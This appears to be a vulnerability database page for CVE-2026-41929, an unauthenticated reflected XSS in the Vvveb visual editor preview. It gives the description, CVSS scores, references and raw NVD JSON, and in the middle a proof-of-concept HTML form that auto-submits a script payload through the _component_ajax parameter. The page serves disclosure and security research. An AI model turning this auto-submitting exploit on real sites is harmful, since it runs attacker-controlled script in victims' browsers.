CVE-2026-41929

Description

Vvveb before 1.0.8.2 contains an unauthenticated reflected cross-site scripting vulnerability in the visual editor preview renderer that allows attackers to execute arbitrary JavaScript by manipulating the r query parameter and _component_ajax POST parameter. Attackers can craft a malicious link or auto-submitted form that causes victims to execute attacker-controlled JavaScript in the context of the Vvveb origin, as the gating function isEditor() performs no session, role, or token verification and the view handler injects raw HTML POST body content without sanitization.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vvveb < 1.0.8.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept for CVE-2026-41929 -->
<!-- This demonstrates the reflected XSS via the preview renderer -->
<html>
<body>
<h2>CVE-2026-41929 PoC: Vvveb Reflected XSS</h2>
<p>Click the button to trigger the XSS payload via auto-submission.</p>

<!-- Form targeting the vulnerable endpoint -->
<form action="http://target-vvveb-url/index.php" method="POST">
    <input type="hidden" name="r" value="editor/editor" />
    <!-- Malicious payload injected via _component_ajax -->
    <input type="hidden" name="_component_ajax" value="<script>alert('XSS by CVE-2026-41929');</script>" />
    <input type="submit" value="Submit Request" />
</form>

<script>
    // Auto-submit to simulate a reflected attack scenario
    document.forms[0].submit();
</script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41929
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41929
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41929/
[4] VulDB https://vuldb.com/cve/CVE-2026-41929
[5] https://github.com/givanz/Vvveb/commit/54a9e846fb94192f1b31ae81d81d25c874662e6a
[6] https://github.com/givanz/Vvveb/releases/tag/1.0.8.2
[7] https://github.com/givanz/Vvveb/security/advisories/GHSA-wwmv-4g9g-p48g
[8] https://www.vulncheck.com/advisories/vvveb-unauthenticated-reflected-xss-via-visual-editor
[9] https://github.com/givanz/Vvveb/security/advisories/GHSA-wwmv-4g9g-p48g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41929", "sourceIdentifier": "[email protected]", "published": "2026-05-07T22:16:35.450", "lastModified": "2026-05-08T15:47:53.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vvveb before 1.0.8.2 contains an unauthenticated reflected cross-site scripting vulnerability in the visual editor preview renderer that allows attackers to execute arbitrary JavaScript by manipulating the r query parameter and _component_ajax POST parameter. Attackers can craft a malicious link or auto-submitted form that causes victims to execute attacker-controlled JavaScript in the context of the Vvveb origin, as the gating function isEditor() performs no session, role, or token verification and the view handler injects raw HTML POST body content without sanitization."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/givanz/Vvveb/commit/54a9e846fb94192f1b31ae81d81d25c874662e6a", "source": "[email protected]"}, {"url": "https://github.com/givanz/Vvveb/releases/tag/1.0.8.2", "source": "[email protected]"}, {"url": "https://github.com/givanz/Vvveb/security/advisories/GHSA-wwmv-4g9g-p48g", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vvveb-unauthenticated-reflected-xss-via-visual-editor", "source": "[email protected]"}, {"url": "https://github.com/givanz/Vvveb/security/advisories/GHSA-wwmv-4g9g-p48g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}